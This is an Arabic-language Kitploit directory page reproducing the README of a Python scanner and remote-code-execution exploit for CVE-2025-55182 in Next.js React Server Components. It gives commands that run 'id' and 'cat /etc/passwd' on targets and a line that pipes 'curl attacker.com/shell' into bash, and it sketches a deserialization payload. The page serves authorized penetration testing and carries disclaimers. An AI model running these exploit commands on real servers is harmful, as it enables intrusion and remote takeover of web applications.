Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — ماسح أمني مبني على بايثون لاكتشاف واستغلال ثغرات **React Server Components (RSC)** في تطبيقات Next.js. تقوم هذه الأداة بالكشف السلبي، وتحديد البصمة النشط، واختبار استغلال RCE. | Kitploit
أدوات/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
ماسحات الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

ماسح أمني مبني على بايثون لاكتشاف واستغلال ثغرات **React Server Components (RSC)** في تطبيقات Next.js. تقوم هذه الأداة بالكشف السلبي، وتحديد البصمة النشط، واختبار استغلال RCE.

عرض المستودع
11منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RSC Detector - ماسح ثغرات مكونات خادم React

ماسح أمني مبني على بايثون لاكتشاف واستغلال ثغرات مكونات خادم React (RSC) في تطبيقات Next.js. تقوم هذه الأداة بالكشف السلبي، وتحديد البصمة النشط، واختبار استغلال تنفيذ الأوامر عن بُعد (RCE).

⚠️ تحذير: هذه الأداة مخصصة لاختبارات الأمن المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على إذن كتابي قبل الاختبار.


الميزات

✅ الكشف السلبي - يحلل HTML والترويسات وبنية الصفحة للبحث عن مؤشرات RSC
✅ تحديد البصمة النشط - يرسل ترويسات خاصة بـ RSC لاكتشاف استجابات الخادم
✅ تحليل ترويسات HTTP - يحدد الترويسات المتعلقة بـ Next.js و RSC
✅ استغلال RCE - ينفذ أوامر على الخوادم الضعيفة (إذا كانت قابلة للاستغلال)
✅ مخرجات طرفية ملونة - تغذية بصرية محسّنة لوضوح أفضل
✅ الوضع التفاعلي - تنفيذ أوامر متعددة في وضع الاستغلال
✅ فك ترميز قوي - يعالج الحمولات المضغوطة بـ gzip والبيانات الثنائية


التثبيت

المتطلبات الأساسية

  • Python 3.8+
  • pip (مدير حزم بايثون)

الإعداد

  1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
  • تثبيت التبعيات

    root@kitploit:~
    pip install -r requirements.txt
    

    الحزم المطلوبة:

    • requests>=2.28.0 - مكتبة عميل HTTP
    • urllib3>=1.26.0 - أدوات HTTP متقدمة
    • colorama>=0.4.6 - ألوان الطرفية (متوافق مع ويندوز)
    • beautifulsoup4 - تحليل HTML

  • الاستخدام

    الكشف الأساسي (بدون استغلال)

    root@kitploit:~
    python rsc_detector.py https://example.com
    

    فحص كامل مع الاستغلال

    root@kitploit:~
    python rsc_detector.py https://example.com --exploit
    

    تنفيذ أمر محدد

    root@kitploit:~
    python rsc_detector.py https://example.com --exploit --cmd "whoami"
    

    وضع الاستغلال التفاعلي

    root@kitploit:~
    python rsc_detector.py https://example.com --exploit
    

    ثم أدخل الأوامر في الموجه (اكتب quit للخروج).


    خيارات سطر الأوامر

    الخيارالوصف
    <URL>عنوان الهدف (مطلوب). يضيف https:// تلقائيًا إذا كان مفقودًا
    --exploitتفعيل استغلال RCE بعد الكشف
    --cmd <command>تنفيذ أمر محدد (يُستخدم مع --exploit)

    أمثلة

    اكتشاف ثغرة RSC:

    root@kitploit:~
    python rsc_detector.py https://target.com
    

    استغلال وتنفيذ أمر id:

    root@kitploit:~
    python rsc_detector.py https://target.com --exploit --cmd "id"
    

    استغلال وتنفيذ cat /etc/passwd:

    root@kitploit:~
    python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
    

    الوضع التفاعلي (أوامر متعددة):

    root@kitploit:~
    python rsc_detector.py https://target.com --exploit
    

    كيف يعمل

    1. الفحص السلبي

    • يتحقق من علامة window.__next_f (موجه تطبيقات Next.js)
    • يكتشف نوع المحتوى text/x-component
    • يبحث عن علامات بروتوكول React Flight
    • يحلل __NEXT_DATA__ وعمليات الاستيراد في Next.js

    2. تحليل الترويسات

    • يفحص ترويسات Server و Vary و X-Nextjs-Cache
    • يحدد دعم RSC في ترويسات HTTP

    3. تحديد البصمة النشط

    • يرسل طلبات مع ترويسة RSC: 1
    • يحلل استجابة الخادم للترويسات الخاصة بـ RSC
    • يكتشف بنية بروتوكول React Flight

    4. استغلال RCE

    • يبني حمولة JSON خبيثة تستغل تسلسل مكونات خادم React
    • يرسل بيانات نموذج متعددة الأجزاء (multipart form-data) لتحفيز تنفيذ التعليمات البرمجية من جانب الخادم
    • يفك ترميز مخرجات الأوامر المشفرة بـ base64
    • يدعم الاستجابات المضغوطة بـ gzip

    المخرجات والنتائج

    نتائج الكشف

    root@kitploit:~
    [*] Starting RSC Detection Scan on: https://example.com
    ====================================================================
    
    [1] Running Passive Scan...
        Status: DETECTED
        Score: 80/100
        - Found: window.__next_f (App Router)
    
    [2] Analyzing Headers...
        - Vary header includes RSC: ...
    
    [3] Running Active Fingerprint...
        Status: DETECTED
        - Response Content-Type became text/x-component
        - Vary header contains 'RSC'
    
    ====================================================================
    
    [FINAL RESULT] VULNERABLE
    [!] This application appears to be vulnerable to RSC-based attacks!
        Consider: RCE exploitation may be possible
    

    مخرجات الاستغلال

    root@kitploit:~
    [*] Executing command: whoami
    [+] Command executed successfully!
    [OUTPUT]
    root
    

    تفاصيل الثغرة

    تستغل CVE-2025-55182:

    • عيوب تسلسل مكونات خادم React (RSC)
    • ثغرات إلغاء تسلسل إجراءات خادم Next.js (Server Actions)
    • تلوث النموذج الأولي للكائنات (Prototype Pollution) عبر حمولات خبيثة
    • حقن الأوامر عبر child_process.execSync()

    سطح الهجوم

    • تطبيقات Next.js التي تستخدم موجه التطبيقات (App Router)
    • المكونات الخادمية ذات المدخلات التي يتحكم فيها المستخدم
    • التطبيقات التي تم تمكين RSC فيها دون تحقق مناسب

    الإرشادات القانونية والأخلاقية

    ⚠️ مهم

    هذه الأداة مخصصة حصريًا لاختبارات الأمن المصرح بها فقط:

    1. ✅ افعل: استخدمها على الأنظمة التي تملكها أو لديك إذن كتابي لاختبارها
    2. ✅ افعل: أبلغ البائع بالثغرات بطريقة مسؤولة
    3. ✅ افعل: اتبع ممارسات الإفصاح المسؤول
    4. ❌ لا تفعل: استخدمها ضد أنظمة دون إذن
    5. ❌ لا تفعل: استخدمها لأغراض خبيثة
    6. ❌ لا تفعل: تخزّن أو تنفّذ بيانات حساسة

    الوصول غير المصرح به إلى أجهزة الكمبيوتر غير قانوني بموجب:

    • قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) - الولايات المتحدة
    • قانون إساءة استخدام الحاسوب لعام 1990 - المملكة المتحدة
    • قوانين مماثلة في معظم البلدان

    الإفصاح المسؤول

    إذا اكتشفت ثغرة باستخدام هذه الأداة:

    1. لا تفصح علنًا حتى يقوم البائع بإصدار التصحيح
    2. تواصل مباشرة مع فريق الأمن لدى البائع
    3. امنح 90 يومًا لتطوير التصحيح
    4. نسّق مع البائع بشأن توقيت الإفصاح
    5. انسب الفضل لنفسك في النشرات الاستشارية بعد الإفصاح

    استكشاف الأخطاء وإصلاحها

    أخطاء شهادات SSL

    تتجاهل الأداة التحقق من SSL افتراضيًا. لتمكين التحقق:

    root@kitploit:~
    detector = RSCDetector(url, verify_ssl=True)
    

    أخطاء فك ترميز Base64

    تقوم الأداة تلقائيًا بـ:

    • إضافة حشو (padding) لسلاسل base64 غير الصالحة
    • اكتشاف وفك ضغط حمولات gzip
    • الرجوع إلى أحرف استبدال UTF-8 للبيانات الثنائية

    عدم وجود مفتاح "digest" في الاستجابة

    • قد لا يكون الهدف ضعيفًا
    • قد يقوم الخادم بتصفية حمولة الاستغلال
    • جرّب الاختبار اليدوي أو نقاط نهاية مختلفة

    مشاكل المهلة الزمنية (Timeout)

    قم بزيادة المهلة الزمنية في الكود:

    root@kitploit:~
    response = self.session.get(self.url, timeout=30)  # 30 seconds
    

    هيكل المشروع

    root@kitploit:~
    CVE-2025-55182/
    ├── README.md                # This file
    ├── requirements.txt         # Python dependencies
    ├── rsc_detector.py         # Main scanner & exploit engine
    ├── rsc_cli.py              # CLI utilities (if present)
    ├── script.py               # Additional scripts (if present)
    ├── COLOR_GUIDE.md          # Color output documentation
    └── .gitignore              # Git ignore rules
    

    التبعيات

    root@kitploit:~
    requests>=2.28.0         # HTTP requests
    urllib3>=1.26.0          # Advanced HTTP
    beautifulsoup4>=4.11.0   # HTML parsing
    colorama>=0.4.6          # Terminal colors (Windows)
    

    ثبّت الكل دفعة واحدة:

    root@kitploit:~
    pip install -r requirements.txt
    

    نصائح الأداء

    • تسريع الكشف: تجاهل علامة --exploit إذا كنت تفحص فقط
    • الاختبار المجمع: أنشئ برنامجًا نصيًا لفحص عناوين URL متعددة
    • مهلة الشبكة: اضبط قيم المهلة للشبكات البطيئة
    • تجاوز SSL: التحقق معطّل افتراضيًا للمرونة

    الاستخدام المتقدم

    تنفيذ أوامر مخصصة

    root@kitploit:~
    python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"
    

    إعادة توجيه المخرجات

    root@kitploit:~
    python rsc_detector.py https://target.com > scan_results.txt 2>&1
    

    الفحص المجمع

    root@kitploit:~
    for url in https://site1.com https://site2.com; do
        python rsc_detector.py "$url"
    done
    

    القيود

    • ⚠️ يعمل فقط على إعدادات Next.js الضعيفة
    • ⚠️ يتطلب تمكين RSC على التطبيق الهدف
    • ⚠️ قد تقوم بعض الخوادم بتصفية أو حظر حمولات الاستغلال
    • ⚠️ قد لا تظهر المخرجات الثنائية بشكل صحيح في الطرفية
    • ⚠️ يعتمد تنفيذ الأوامر على صلاحيات الخادم

    المساهمة

    وجدت خطأ أو لديك تحسين؟ المساهمات مرحب بها!

    1. انسخ المستودع (Fork)
    2. أنشئ فرع ميزة (git checkout -b feature/improvement)
    3. احفظ تغييراتك (git commit -am 'Add feature')
    4. ادفع إلى الفرع (git push origin feature/improvement)
    5. قدّم طلب سحب (Pull Request)

    إخلاء المسؤولية

    root@kitploit:~
    THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
    THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
    USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.
    

    الترخيص

    هذا المشروع مقدم لأغراض تعليمية واختبارات الأمن المصرح بها فقط.


    المراجع

    • توثيق React Server Components
    • Next.js App Router
    • CVE-2025-55182 (عند توفره)
    • OWASP: عيوب الحقن

    التواصل والدعم

    • الإبلاغ عن الثغرات: استخدم الإفصاح المسؤول
    • القضايا الأمنية: لا تنشرها علنًا؛ تواصل مع المشرفين مباشرة
    • طلبات الميزات: افتح مشكلة (Issue) على GitHub

    المؤلف

    أُنشئ لأغراض البحث الأمني واختبارات الاختراق المصرح بها.

    آخر تحديث: 19 ديسمبر 2025


    سجل التغييرات

    v1.0.0

    • ✅ الكشف السلبي عن RSC
    • ✅ تحديد البصمة النشط
    • ✅ استغلال RCE
    • ✅ مخرجات طرفية ملونة
    • ✅ وضع الاستغلال التفاعلي
    • ✅ دعم فك ضغط gzip
    • ✅ فك ترميز base64 قوي

    تذكر: القوة العظيمة تأتي مع مسؤولية عظيمة. استخدم هذه الأداة بشكل أخلاقي وقانوني.

    تنزيل الأداة